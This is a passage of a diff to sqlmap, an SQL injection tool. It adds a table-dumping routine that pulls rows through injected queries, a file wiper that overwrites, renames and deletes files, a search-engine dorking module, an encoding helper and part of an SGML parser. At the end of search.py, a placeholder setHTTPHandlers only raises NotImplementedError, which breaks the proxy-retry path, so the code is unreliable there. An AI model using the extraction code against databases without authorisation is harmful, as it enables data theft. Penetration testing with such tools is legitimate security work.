b/lib/utils/pivotdumptable.py @@ -1,31 +1,42 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -from extra.safe2bin.safe2bin import safechardecode +import re + from lib.core.agent import agent from lib.core.bigarray import BigArray from lib.core.common import Backend +from lib.core.common import filterNone +from lib.core.common import getSafeExString from lib.core.common import isNoneValue from lib.core.common import isNumPosStrValue from lib.core.common import singleTimeWarnMessage from lib.core.common import unArrayizeValue from lib.core.common import unsafeSQLIdentificatorNaming +from lib.core.compat import xrange +from lib.core.convert import getUnicode from lib.core.data import conf +from lib.core.data import kb from lib.core.data import logger from lib.core.data import queries +from lib.core.dicts import DUMP_REPLACEMENTS from lib.core.enums import CHARSET_TYPE from lib.core.enums import EXPECTED from lib.core.exception import SqlmapConnectionException from lib.core.exception import SqlmapNoneDataException from lib.core.settings import MAX_INT +from lib.core.settings import NULL +from lib.core.settings import SINGLE_QUOTE_MARKER from lib.core.unescaper import unescaper from lib.request import inject +from lib.utils.safe2bin import safechardecode +from thirdparty.six import unichr as _unichr -def pivotDumpTable(table, colList, count=None, blind=True): +def pivotDumpTable(table, colList, count=None, blind=True, alias=None): lengths = {} entries = {} @@ -36,9 +47,10 @@ def pivotDumpTable(table, colList, count=None, blind=True): if count is None: query = dumpNode.count % table + query = agent.whereQuery(query) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if blind else inject.getValue(query, blind=False, time=False, expected=EXPECTED.INT) - if isinstance(count, basestring) and count.isdigit(): + if hasattr(count, "isdigit") and count.isdigit(): count = int(count) if count == 0: @@ -58,66 +70,91 @@ def pivotDumpTable(table, colList, count=None, blind=True): lengths[column] = 0 entries[column] = BigArray() - colList = filter(None, sorted(colList, key=lambda x: len(x) if x else MAX_INT)) - - for column in colList: - infoMsg = "fetching number of distinct " - infoMsg += "values for column '%s'" % column - logger.info(infoMsg) - - query = dumpNode.count2 % (column, table) - value = inject.getValue(query, blind=blind, union=not blind, error=not blind, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - - if isNumPosStrValue(value): - validColumnList = True + colList = filterNone(sorted(colList, key=lambda x: len(x) if x else MAX_INT)) - if value == count: - infoMsg = "using column '%s' as a pivot " % column + if conf.pivotColumn: + for _ in colList: + if re.search(r"(.+\.)?%s" % re.escape(conf.pivotColumn), _, re.I): + infoMsg = "using column '%s' as a pivot " % conf.pivotColumn infoMsg += "for retrieving row data" logger.info(infoMsg) - validPivotValue = True + colList.remove(_) + colList.insert(0, _) - colList.remove(column) - colList.insert(0, column) + validPivotValue = True break - if not validColumnList: - errMsg = "all column name(s) provided are non-existent" - raise SqlmapNoneDataException(errMsg) + if not validPivotValue: + warnMsg = "column '%s' not " % conf.pivotColumn + warnMsg += "found in table '%s'" % table + logger.warning(warnMsg) if not validPivotValue: - warnMsg = "no proper pivot column provided (with unique values)." - warnMsg += " It won't be possible to retrieve all rows" - logger.warn(warnMsg) + for column in colList: + infoMsg = "fetching number of distinct " + infoMsg += "values for column '%s'" % column.replace(("%s." % alias) if alias else "", "") + logger.info(infoMsg) + + query = dumpNode.count2 % (column, table) + query = agent.whereQuery(query) + value = inject.getValue(query, blind=blind, union=not blind, error=not blind, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + + if isNumPosStrValue(value): + validColumnList = True + + if value == count: + infoMsg = "using column '%s' as a pivot " % column.replace(("%s." % alias) if alias else "", "") + infoMsg += "for retrieving row data" + logger.info(infoMsg) + + validPivotValue = True + colList.remove(column) + colList.insert(0, column) + break + + if not validColumnList: + errMsg = "all provided column name(s) are non-existent" + raise SqlmapNoneDataException(errMsg) + + if not validPivotValue: + warnMsg = "no proper pivot column provided (with unique values)." + warnMsg += " It won't be possible to retrieve all rows" + logger.warning(warnMsg) pivotValue = " " breakRetrieval = False + def _(column, pivotValue): + if column == colList[0]: + query = dumpNode.query.replace("'%s'" if unescaper.escape(pivotValue, False) != pivotValue else "%s", "%s") % (agent.preprocessField(table, column), table, agent.preprocessField(table, column), unescaper.escape(pivotValue, False)) + else: + query = dumpNode.query2.replace("'%s'" if unescaper.escape(pivotValue, False) != pivotValue else "%s", "%s") % (agent.preprocessField(table, column), table, agent.preprocessField(table, colList[0]), unescaper.escape(pivotValue, False) if SINGLE_QUOTE_MARKER not in dumpNode.query2 else pivotValue) + + query = agent.whereQuery(query) + return unArrayizeValue(inject.getValue(query, blind=blind, time=blind, union=not blind, error=not blind)) + try: for i in xrange(count): if breakRetrieval: break for column in colList: - def _(pivotValue): - if column == colList[0]: - query = dumpNode.query.replace("'%s'", "%s") % (agent.preprocessField(table, column), table, agent.preprocessField(table, column), unescaper.escape(pivotValue, False)) - else: - query = dumpNode.query2.replace("'%s'", "%s") % (agent.preprocessField(table, column), table, agent.preprocessField(table, colList[0]), unescaper.escape(pivotValue, False)) - - return unArrayizeValue(inject.getValue(query, blind=blind, time=blind, union=not blind, error=not blind)) - - value = _(pivotValue) + value = _(column, pivotValue) if column == colList[0]: if isNoneValue(value): - for pivotValue in filter(None, (" " if pivotValue == " " else None, "%s%s" % (pivotValue[0], unichr(ord(pivotValue[1]) + 1)) if len(pivotValue) > 1 else None, unichr(ord(pivotValue[0]) + 1))): - value = _(pivotValue) - if not isNoneValue(value): - break - if isNoneValue(value): + try: + for pivotValue in filterNone((" " if pivotValue == " " else None, "%s%s" % (pivotValue[0], _unichr(ord(pivotValue[1]) + 1)) if len(pivotValue) > 1 else None, _unichr(ord(pivotValue[0]) + 1))): + value = _(column, pivotValue) + if not isNoneValue(value): + break + except ValueError: + pass + + if isNoneValue(value) or value == NULL: breakRetrieval = True break + pivotValue = safechardecode(value) if conf.limitStart or conf.limitStop: @@ -132,18 +169,20 @@ def _(pivotValue): value = "" if isNoneValue(value) else unArrayizeValue(value) - lengths[column] = max(lengths[column], len(value) if value else 0) + lengths[column] = max(lengths[column], len(DUMP_REPLACEMENTS.get(getUnicode(value), getUnicode(value)))) entries[column].append(value) except KeyboardInterrupt: + kb.dumpKeyboardInterrupt = True + warnMsg = "user aborted during enumeration. sqlmap " warnMsg += "will display partial output" - logger.warn(warnMsg) + logger.warning(warnMsg) - except SqlmapConnectionException, e: - errMsg = "connection exception detected. sqlmap " + except SqlmapConnectionException as ex: + errMsg = "connection exception detected ('%s'). sqlmap " % getSafeExString(ex) errMsg += "will display partial output" - errMsg += "'%s'" % e + logger.critical(errMsg) return entries, lengths diff --git a/lib/core/progress.py b/lib/utils/progress.py similarity index 59% rename from lib/core/progress.py rename to lib/utils/progress.py index 0db932530d6..1bfb10656d9 100644 --- a/lib/core/progress.py +++ b/lib/utils/progress.py @@ -1,13 +1,18 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -from lib.core.common import getUnicode +from __future__ import division + +import time + from lib.core.common import dataToStdout +from lib.core.convert import getUnicode from lib.core.data import conf +from lib.core.data import kb class ProgressBar(object): """ @@ -16,17 +21,17 @@ class ProgressBar(object): def __init__(self, minValue=0, maxValue=10, totalWidth=None): self._progBar = "[]" - self._oldProgBar = "" self._min = int(minValue) self._max = int(maxValue) - self._span = self._max - self._min + self._span = max(self._max - self._min, 0.001) self._width = totalWidth if totalWidth else conf.progressWidth self._amount = 0 + self._start = None self.update() def _convertSeconds(self, value): seconds = value - minutes = seconds / 60 + minutes = seconds // 60 seconds = seconds - (minutes * 60) return "%.2d:%.2d" % (minutes, seconds) @@ -47,10 +52,10 @@ def update(self, newAmount=0): diffFromMin = float(self._amount - self._min) percentDone = (diffFromMin / float(self._span)) * 100.0 percentDone = round(percentDone) - percentDone = int(percentDone) + percentDone = min(100, int(percentDone)) # Figure out how many hash bars the percentage should be - allFull = self._width - 2 + allFull = self._width - len("100%% [] %s/%s (ETA 00:00)" % (self._max, self._max)) numHashes = (percentDone / 100.0) * allFull numHashes = int(round(numHashes)) @@ -60,26 +65,36 @@ def update(self, newAmount=0): elif numHashes == allFull: self._progBar = "[%s]" % ("=" * allFull) else: - self._progBar = "[%s>%s]" % ("=" * (numHashes - 1), - " " * (allFull - numHashes)) + self._progBar = "[%s>%s]" % ("=" * (numHashes - 1), " " * (allFull - numHashes)) # Add the percentage at the beginning of the progress bar percentString = getUnicode(percentDone) + "%" self._progBar = "%s %s" % (percentString, self._progBar) - def draw(self, eta=0): + def progress(self, newAmount): """ - This method draws the progress bar if it has changed + This method saves item delta time and shows updated progress bar with calculated eta """ - if self._progBar != self._oldProgBar: - self._oldProgBar = self._progBar + if self._start is None or newAmount > self._max: + self._start = time.time() + eta = None + else: + delta = time.time() - self._start + eta = (self._max - self._min) * (1.0 * delta / newAmount) - delta + + self.update(newAmount) + self.draw(eta) + + def draw(self, eta=None): + """ + This method draws the progress bar if it has changed + """ - if eta and self._amount < self._max: - dataToStdout("\r%s %d/%d ETA %s" % (self._progBar, self._amount, self._max, self._convertSeconds(int(eta)))) - else: - blank = " " * (80 - len("\r%s %d/%d" % (self._progBar, self._amount, self._max))) - dataToStdout("\r%s %d/%d%s" % (self._progBar, self._amount, self._max, blank)) + dataToStdout("\r%s %d/%d%s" % (self._progBar, self._amount, self._max, (" (ETA %s)" % (self._convertSeconds(int(eta)) if eta is not None else "??:??")))) + if self._amount >= self._max: + dataToStdout("\r%s\r" % (" " * self._width)) + kb.prependFlag = False def __str__(self): """ diff --git a/lib/utils/purge.py b/lib/utils/purge.py new file mode 100644 index 00000000000..b1c0e6cd41e --- /dev/null +++ b/lib/utils/purge.py @@ -0,0 +1,86 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import functools +import os +import random +import shutil +import stat +import string + +from lib.core.common import getSafeExString +from lib.core.common import openFile +from lib.core.compat import xrange +from lib.core.convert import getUnicode +from lib.core.data import logger +from thirdparty.six import unichr as _unichr + +def purge(directory): + """ + Safely removes content from a given directory + """ + + if not os.path.isdir(directory): + warnMsg = "skipping purging of directory '%s' as it does not exist" % directory + logger.warning(warnMsg) + return + + infoMsg = "purging content of directory '%s'..." % directory + logger.info(infoMsg) + + filepaths = [] + dirpaths = [] + + for rootpath, directories, filenames in os.walk(directory): + dirpaths.extend(os.path.abspath(os.path.join(rootpath, _)) for _ in directories) + filepaths.extend(os.path.abspath(os.path.join(rootpath, _)) for _ in filenames) + + logger.debug("changing file attributes") + for filepath in filepaths: + try: + os.chmod(filepath, stat.S_IREAD | stat.S_IWRITE) + except: + pass + + logger.debug("writing random data to files") + for filepath in filepaths: + try: + filesize = os.path.getsize(filepath) + with openFile(filepath, "w+") as f: + f.write("".join(_unichr(random.randint(0, 255)) for _ in xrange(filesize))) + except: + pass + + logger.debug("truncating files") + for filepath in filepaths: + try: + with open(filepath, 'w') as f: + pass + except: + pass + + logger.debug("renaming filenames to random values") + for filepath in filepaths: + try: + os.rename(filepath, os.path.join(os.path.dirname(filepath), "".join(random.sample(string.ascii_letters, random.randint(4, 8))))) + except: + pass + + dirpaths.sort(key=functools.cmp_to_key(lambda x, y: y.count(os.path.sep) - x.count(os.path.sep))) + + logger.debug("renaming directory names to random values") + for dirpath in dirpaths: + try: + os.rename(dirpath, os.path.join(os.path.dirname(dirpath), "".join(random.sample(string.ascii_letters, random.randint(4, 8))))) + except: + pass + + logger.debug("deleting the whole directory tree") + try: + shutil.rmtree(directory) + except OSError as ex: + logger.error("problem occurred while removing directory '%s' ('%s')" % (getUnicode(directory), getSafeExString(ex))) diff --git a/lib/utils/safe2bin.py b/lib/utils/safe2bin.py new file mode 100644 index 00000000000..35d0a77cbac --- /dev/null +++ b/lib/utils/safe2bin.py @@ -0,0 +1,103 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import binascii +import re +import string +import sys + +PY3 = sys.version_info >= (3, 0) + +if PY3: + xrange = range + text_type = str + string_types = (str,) + unichr = chr +else: + text_type = unicode + string_types = (basestring,) + +# Regex used for recognition of hex encoded characters +HEX_ENCODED_CHAR_REGEX = r"(?P<result>\\x[0-9A-Fa-f]{2})" + +# Raw chars that will be safe encoded to their slash (\) representations (e.g. newline to \n) +SAFE_ENCODE_SLASH_REPLACEMENTS = "\t\n\r\x0b\x0c" + +# Characters that don't need to be safe encoded +SAFE_CHARS = "".join([_ for _ in string.printable.replace('\\', '') if _ not in SAFE_ENCODE_SLASH_REPLACEMENTS]) + +# Prefix used for hex encoded values +HEX_ENCODED_PREFIX = r"\x" + +# Strings used for temporary marking of hex encoded prefixes (to prevent double encoding) +HEX_ENCODED_PREFIX_MARKER = "__HEX_ENCODED_PREFIX__" + +# String used for temporary marking of slash characters +SLASH_MARKER = "__SLASH__" + +def safecharencode(value): + """ + Returns safe representation of a given basestring value + + >>> safecharencode(u'test123') == u'test123' + True + >>> safecharencode(u'test\x01\x02\xaf') == u'test\\\\x01\\\\x02\\xaf' + True + """ + + retVal = value + + if isinstance(value, string_types): + if any(_ not in SAFE_CHARS for _ in value): + retVal = retVal.replace(HEX_ENCODED_PREFIX, HEX_ENCODED_PREFIX_MARKER) + retVal = retVal.replace('\\', SLASH_MARKER) + + for char in SAFE_ENCODE_SLASH_REPLACEMENTS: + retVal = retVal.replace(char, repr(char).strip('\'')) + + for char in set(retVal): + if not (char in string.printable or isinstance(value, text_type) and ord(char) >= 160): + retVal = retVal.replace(char, '\\x%02x' % ord(char)) + + retVal = retVal.replace(SLASH_MARKER, "\\\\") + retVal = retVal.replace(HEX_ENCODED_PREFIX_MARKER, HEX_ENCODED_PREFIX) + elif isinstance(value, list): + for i in xrange(len(value)): + retVal[i] = safecharencode(value[i]) + + return retVal + +def safechardecode(value, binary=False): + """ + Reverse function to safecharencode + """ + + retVal = value + if isinstance(value, string_types): + retVal = retVal.replace('\\\\', SLASH_MARKER) + + while True: + match = re.search(HEX_ENCODED_CHAR_REGEX, retVal) + if match: + retVal = retVal.replace(match.group("result"), unichr(ord(binascii.unhexlify(match.group("result").lstrip("\\x"))))) + else: + break + + for char in SAFE_ENCODE_SLASH_REPLACEMENTS[::-1]: + retVal = retVal.replace(repr(char).strip('\''), char) + + retVal = retVal.replace(SLASH_MARKER, '\\') + + if binary: + if isinstance(retVal, text_type): + retVal = retVal.encode("utf8", errors="surrogatepass" if PY3 else "strict") + + elif isinstance(value, (list, tuple)): + for i in xrange(len(value)): + retVal[i] = safechardecode(value[i]) + + return retVal diff --git a/lib/utils/search.py b/lib/utils/search.py new file mode 100644 index 00000000000..985226891fb --- /dev/null +++ b/lib/utils/search.py @@ -0,0 +1,213 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import re +import socket + +from lib.core.common import getSafeExString +from lib.core.common import popValue +from lib.core.common import pushValue +from lib.core.common import readInput +from lib.core.common import urlencode +from lib.core.convert import getBytes +from lib.core.convert import getUnicode +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.decorators import stackedmethod +from lib.core.enums import CUSTOM_LOGGING +from lib.core.enums import HTTP_HEADER +from lib.core.enums import REDIRECTION +from lib.core.exception import SqlmapBaseException +from lib.core.exception import SqlmapConnectionException +from lib.core.exception import SqlmapUserQuitException +from lib.core.settings import BING_REGEX +from lib.core.settings import DUCKDUCKGO_REGEX +from lib.core.settings import DUMMY_SEARCH_USER_AGENT +from lib.core.settings import GOOGLE_CONSENT_COOKIE +from lib.core.settings import GOOGLE_REGEX +from lib.core.settings import HTTP_ACCEPT_ENCODING_HEADER_VALUE +from lib.core.settings import UNICODE_ENCODING +from lib.request.basic import decodePage +from thirdparty.six.moves import http_client as _http_client +from thirdparty.six.moves import urllib as _urllib +from thirdparty.socks import socks + +def _search(dork): + """ + This method performs the effective search on Google providing + the google dork and the Google session cookie + """ + + if not dork: + return None + + page = None + data = None + requestHeaders = {} + responseHeaders = {} + + requestHeaders[HTTP_HEADER.USER_AGENT] = dict(conf.httpHeaders).get(HTTP_HEADER.USER_AGENT, DUMMY_SEARCH_USER_AGENT) + requestHeaders[HTTP_HEADER.ACCEPT_ENCODING] = HTTP_ACCEPT_ENCODING_HEADER_VALUE + requestHeaders[HTTP_HEADER.COOKIE] = GOOGLE_CONSENT_COOKIE + + try: + req = _urllib.request.Request("https://www.google.com/ncr", headers=requestHeaders) + conn = _urllib.request.urlopen(req) + except Exception as ex: + errMsg = "unable to connect to Google ('%s')" % getSafeExString(ex) + raise SqlmapConnectionException(errMsg) + + gpage = conf.googlePage if conf.googlePage > 1 else 1 + logger.info("using search result page #%d" % gpage) + + url = "https://www.google.com/search?" # NOTE: if consent fails, try to use the "http://" + url += "q=%s&" % urlencode(dork, convall=True) + url += "num=100&hl=en&complete=0&safe=off&filter=0&btnG=Search" + url += "&start=%d" % ((gpage - 1) * 100) + + try: + req = _urllib.request.Request(url, headers=requestHeaders) + conn = _urllib.request.urlopen(req) + + requestMsg = "HTTP request:\nGET %s" % url + requestMsg += " %s" % _http_client.HTTPConnection._http_vsn_str + logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg) + + page = conn.read() + code = conn.code + status = conn.msg + responseHeaders = conn.info() + + responseMsg = "HTTP response (%s - %d):\n" % (status, code) + + if conf.verbose <= 4: + responseMsg += getUnicode(responseHeaders, UNICODE_ENCODING) + elif conf.verbose > 4: + responseMsg += "%s\n%s\n" % (responseHeaders, page) + + logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg) + except _urllib.error.HTTPError as ex: + try: + page = ex.read() + responseHeaders = ex.info() + except Exception as _: + warnMsg = "problem occurred while trying to get " + warnMsg += "an error page information (%s)" % getSafeExString(_) + logger.critical(warnMsg) + return None + except (_urllib.error.URLError, _http_client.error, socket.error, socket.timeout, socks.ProxyError): + errMsg = "unable to connect to Google" + raise SqlmapConnectionException(errMsg) + + page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE)) + + page = getUnicode(page) # Note: if decodePage call fails (Issue #4202) + + retVal = [_urllib.parse.unquote(match.group(1) or match.group(2)) for match in re.finditer(GOOGLE_REGEX, page, re.I)] + + if not retVal and "detected unusual traffic" in page: + warnMsg = "Google has detected 'unusual' traffic from " + warnMsg += "used IP address disabling further searches" + + if conf.proxyList: + raise SqlmapBaseException(warnMsg) + else: + logger.critical(warnMsg) + + if not retVal: + message = "no usable links found. What do you want to do?" + message += "\n[1] (re)try with DuckDuckGo (default)" + message += "\n[2] (re)try with Bing" + message += "\n[3] quit" + choice = readInput(message, default='1') + + if choice == '3': + raise SqlmapUserQuitException + elif choice == '2': + url = "https://www.bing.com/search?q=%s&first=%d" % (urlencode(dork, convall=True), (gpage - 1) * 10 + 1) + regex = BING_REGEX + else: + url = "https://html.duckduckgo.com/html/" + data = "q=%s&s=%d" % (urlencode(dork, convall=True), (gpage - 1) * 30) + regex = DUCKDUCKGO_REGEX + + try: + req = _urllib.request.Request(url, data=getBytes(data), headers=requestHeaders) + conn = _urllib.request.urlopen(req) + + requestMsg = "HTTP request:\nGET %s" % url + requestMsg += " %s" % _http_client.HTTPConnection._http_vsn_str + logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg) + + page = conn.read() + code = conn.code + status = conn.msg + responseHeaders = conn.info() + page = decodePage(page, responseHeaders.get("Content-Encoding"), responseHeaders.get("Content-Type")) + + responseMsg = "HTTP response (%s - %d):\n" % (status, code) + + if conf.verbose <= 4: + responseMsg += getUnicode(responseHeaders, UNICODE_ENCODING) + elif conf.verbose > 4: + responseMsg += "%s\n%s\n" % (responseHeaders, page) + + logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg) + except _urllib.error.HTTPError as ex: + try: + page = ex.read() + page = decodePage(page, ex.headers.get("Content-Encoding"), ex.headers.get("Content-Type")) + except socket.timeout: + warnMsg = "connection timed out while trying " + warnMsg += "to get error page information (%d)" % ex.code + logger.critical(warnMsg) + return None + except: + errMsg = "unable to connect" + raise SqlmapConnectionException(errMsg) + + page = getUnicode(page) # Note: if decodePage call fails (Issue #4202) + + retVal = [_urllib.parse.unquote(match.group(1).replace("&", "&")) for match in re.finditer(regex, page, re.I | re.S)] + + if not retVal and "issue with the Tor Exit Node you are currently using" in page: + warnMsg = "DuckDuckGo has detected 'unusual' traffic from " + warnMsg += "used (Tor) IP address" + + if conf.proxyList: + raise SqlmapBaseException(warnMsg) + else: + logger.critical(warnMsg) + + return retVal + +@stackedmethod +def search(dork): + pushValue(kb.choices.redirect) + kb.choices.redirect = REDIRECTION.YES + + try: + return _search(dork) + except SqlmapBaseException as ex: + if conf.proxyList: + logger.critical(getSafeExString(ex)) + + warnMsg = "changing proxy" + logger.warning(warnMsg) + + conf.proxy = None + + setHTTPHandlers() + return search(dork) + else: + raise + finally: + kb.choices.redirect = popValue() + +def setHTTPHandlers(): # Cross-referenced function + raise NotImplementedError diff --git a/lib/utils/sgmllib.py b/lib/utils/sgmllib.py new file mode 100644 index 00000000000..afcdff95314 --- /dev/null +++ b/lib/utils/sgmllib.py @@ -0,0 +1,574 @@ +"""A parser for SGML, using the derived class as a static DTD.""" + +# Note: missing in Python3 + +# XXX This only supports those SGML features used by HTML. + +# XXX There should be a way to distinguish between PCDATA (parsed +# character data -- the normal case), RCDATA (replaceable character +# data -- only char and entity references and end tags are special) +# and CDATA (character data -- only end tags are special). RCDATA is +# not supported at all. + +from __future__ import print_function + +try: + import _markupbase as markupbase +except: + import markupbase + +import re + +__all__ = ["SGMLParser", "SGMLParseError"] + +# Regular expressions used for parsing + +interesting = re.compile('[&<]') +incomplete = re.compile('&([a-zA-Z][a-zA-Z0-9]*|#[0-9]*)?|' + '<([a-zA-Z][^<>]*|' + '/([a-zA-Z][^<>]*)?|' + '![^<>]*)?') + +entityref = re.compile('&([a-zA-Z][-.a-zA-Z0-9]*)[^a-zA-Z0-9]') +charref = re.compile('&#([0-9]+)[^0-9]') + +starttagopen = re.compile('<[>a-zA-Z]') +shorttagopen = re.compile('<[a-zA-Z][-.a-zA-Z0-9]*/') +shorttag = re.compile('<([a-zA-Z][-.a-zA-Z0-9]*)/([^/]*)/') +piclose = re.compile('>') +endbracket = re.compile('[<>]') +tagfind = re.compile('[a-zA-Z][-_.a-zA-Z0-9]*') +attrfind = re.compile( + r'\s*([a-zA-Z_][-:.a-zA-Z_0-9]*)(\s*=\s*' + r'(\'[^\']*\'|"[^"]*"|[][\-a-zA-Z0-9./,:;+*%?!&$\(\)_#=~\'"@]*))?') + + +class SGMLParseError(RuntimeError): + """Exception raised for all parse errors.""" + pass + + +# SGML parser base class -- find tags and call handler functions. +# Usage: p = SGMLParser(); p.feed(data); ...; p.close(). +# The dtd is defined by deriving a class which defines methods +# with special names to handle tags: start_foo and end_foo to handle +# <foo> and </foo>, respectively, or do_foo to handle <foo> by itself. +# (Tags are converted to lower case for this purpose.) The data +# between tags is passed to the parser by calling self.handle_data() +# with some data as argument (the data may be split up in arbitrary +# chunks). Entity references are passed by calling +# self.handle_entityref() with the entity reference as argument. + +class SGMLParser(markupbase.ParserBase): + # Definition of entities -- derived classes may override + entity_or_charref = re.compile('&(?:' + '([a-zA-Z][-.a-zA-Z0-9]*)|#([0-9]+)' + ')(;?)') + + def __init__(self, verbose=0): + """Initialize and reset this instance.""" + self.verbose = verbose + self.reset() + + def reset(self): + """Reset this instance. Loses all unprocessed data.""" + self.__starttag_text = None + self.rawdata = '' + self.stack = [] + self.lasttag = '???' + self.nomoretags = 0 + self.literal = 0 + markupbase.ParserBase.reset(self) + + def setnomoretags(self): + """Enter literal mode (CDATA) till EOF. + + Intended for derived classes only. + """ + self.nomoretags = self.literal = 1 + + def setliteral(self, *args): + """Enter literal mode (CDATA). + + Intended for derived classes only. + """ + self.literal = 1 + + def feed(self, data): + """Feed some data to the parser. + + Call this as often as you want, with as little or as much text + as you want (may include '\n'). (This just saves the text, + all the processing is done by goahead().) + """ + + self.rawdata = self.rawdata + data + self.goahead(0) + + def close(self): + """Handle the remaining data.""" + self.goahead(1) + + def error(self, message): + raise SGMLParseError(message) + + # Internal -- handle data as far as reasonable. May leave state + # and data to be processed by a subsequent call. If 'end' is + # true, force handling all data as if followed by EOF marker. + def goahead(self, end): + rawdata = self.rawdata + i = 0 + n = len(rawdata) + while i < n: + if self.nomoretags: + self.handle_data(rawdata[i:n]) + i = n + break + match = interesting.search(rawdata, i) + if match: + j = match.start() + else: + j = n + if i < j: + self.handle_data(rawdata[i:j]) + i = j + if i == n: + break + if rawdata[i] == '<': + if starttagopen.match(rawdata, i): + if self.literal: + self.handle_data(rawdata[i]) + i = i + 1 + continue + k = self.parse_starttag(i) + if k < 0: + break + i = k + continue + if rawdata.startswith("</", i): + k = self.parse_endtag(i) + if k < 0: + break + i = k + self.literal = 0 + continue + if self.literal: + if n > (i + 1): + self.handle_data("<") + i = i + 1 + else: + # incomplete + break + continue + if rawdata.startswith("<!--", i): + # Strictly speaking, a comment is --.*-- + # within a declaration tag <!...>. + # This should be removed, + # and comments handled only in parse_declaration. + k = self.parse_comment(i) + if k < 0: + break + i = k + continue + if rawdata.startswith("<?", i): + k = self.parse_pi(i) + if k < 0: + break + i = i + k + continue + if rawdata.startswith("<!", i): + # This is some sort of declaration; in "HTML as + # deployed," this should only be the document type + # declaration ("<!DOCTYPE html...>"). + k = self.parse_declaration(i) + if k < 0: + break + i = k + continue + elif rawdata[i] == '&': + if self.literal: + self.handle_data(rawdata[i]) + i = i + 1 + continue + match = charref.match(rawdata, i) + if match: + name = match.group(1) + self.handle_charref(name) + i = match.end(0) + if rawdata[i - 1] != ';': + i = i - 1 + continue + match = entityref.match(rawdata, i) + if match: + name = match.group(1) + self.handle_entityref(name) + i = match.end(0) + if rawdata[i - 1] != ';': + i = i - 1 + continue + else: + self.error('neither < nor & ??') + # We get here only if incomplete matches but + # nothing else + match = incomplete.match(rawdata, i) + if not match: + self.handle_data(rawdata[i]) + i = i + 1 + continue + j = match.end(0) + if j == n: + break # Really incomplete + self.handle_data(rawdata[i:j]) + i = j + # end while + if end and i < n: + self.handle_data(rawdata[i:n]) + i = n + self.rawdata = rawdata[i:] + # XXX if end: check for empty stack + + # Extensions for the DOCTYPE scanner: + _decl_otherchars = '=' + + # Internal -- parse processing instr, return length or -1 if not terminated + def parse_pi(self, i): + rawdata = self.rawdata + if rawdata[i:i + 2] != '<?': + self.error('unexpected call to parse_pi()') + match = piclose.search(rawdata, i + 2) + if not match: + return -1 + j = match.start(0) + self.handle_pi(rawdata[i + 2: j]) + j = match.end(0) + return j - i + + def get_starttag_text(self): + return self.__starttag_text + + # Internal -- handle starttag, return length or -1 if not terminated + def parse_starttag(self, i): + self.__starttag_text = None + start_pos = i + rawdata = self.rawdata + if shorttagopen.match(rawdata, i): + # SGML shorthand: <tag/data/ == <tag>data</tag> + # XXX Can data contain &... (entity or char refs)? + # XXX Can data contain < or > (tag characters)? + # XXX Can there be whitespace before the first /? + match = shorttag.match(rawdata, i) + if not match: + return -1 + tag, data = match.group(1, 2) + self.__starttag_text = '<%s/' % tag + tag = tag.lower() + k = match.end(0) + self.finish_shorttag(tag, data) + self.__starttag_text = rawdata[start_pos:match.end(1) + 1] + return k + # XXX The following should skip matching quotes (' or ") + # As a shortcut way to exit, this isn't so bad, but shouldn't + # be used to locate the actual end of the start tag since the + # < or > characters may be embedded in an attribute value. + match = endbracket.search(rawdata, i + 1) + if not match: + return -1 + j = match.start(0) + # Now parse the data between i + 1 and j into a tag and attrs + attrs = [] + if rawdata[i:i + 2] == '<>': + # SGML shorthand: <> == <last open tag seen> + k = j + tag = self.lasttag + else: + match = tagfind.match(rawdata, i + 1) + if not match: + self.error('unexpected call to parse_starttag') + k = match.end(0) + tag = rawdata[i + 1:k].lower() + self.lasttag = tag + while k < j: + match = attrfind.match(rawdata, k) + if not match: + break + attrname, rest, attrvalue = match.group(1, 2, 3) + if not rest: + attrvalue = attrname + else: + if (attrvalue[:1] == "'" == attrvalue[-1:] or + attrvalue[:1] == '"' == attrvalue[-1:]): + # strip quotes + attrvalue = attrvalue[1:-1] + attrvalue = self.entity_or_charref.sub( + self._convert_ref, attrvalue) + attrs.append((attrname.lower(), attrvalue)) + k = match.end(0) + if rawdata[j] == '>': + j = j + 1 + self.__starttag_text = rawdata[start_pos:j] + self.finish_starttag(tag, attrs) + return j + + # Internal -- convert entity or character reference + def _convert_ref(self, match): + if match.group(2): + return self.convert_charref(match.group(2)) or \ + '&#%s%s' % match.groups()[1:] + elif match.group(3): + return self.convert_entityref(match.group(1)) or \ + '&%s;' % match.group(1) + else: + return '&%s' % match.group(1) + + # Internal -- parse endtag + def parse_endtag(self, i): + rawdata = self.rawdata + match = endbracket.search(rawdata, i + 1) + if not match: + return -1 + j = match.start(0) + tag = rawdata[i + 2:j].strip().lower() + if rawdata[j] == '>': + j = j + 1 + self.finish_endtag(tag) + return j + + # Internal -- finish parsing of <tag/data/ (same as <tag>data</tag>) + def finish_shorttag(self, tag, data): + self.finish_starttag(tag, []) + self.handle_data(data) + self.finish_endtag(tag) + + # Internal -- finish processing of start tag + # Return -1 for unknown tag, 0 for open-only tag, 1 for balanced tag + def finish_starttag(self, tag, attrs): + try: + method = getattr(self, 'start_' + tag) + except AttributeError: + try: + method = getattr(self, 'do_' + tag) + except AttributeError: + self.unknown_starttag(tag, attrs) + return -1 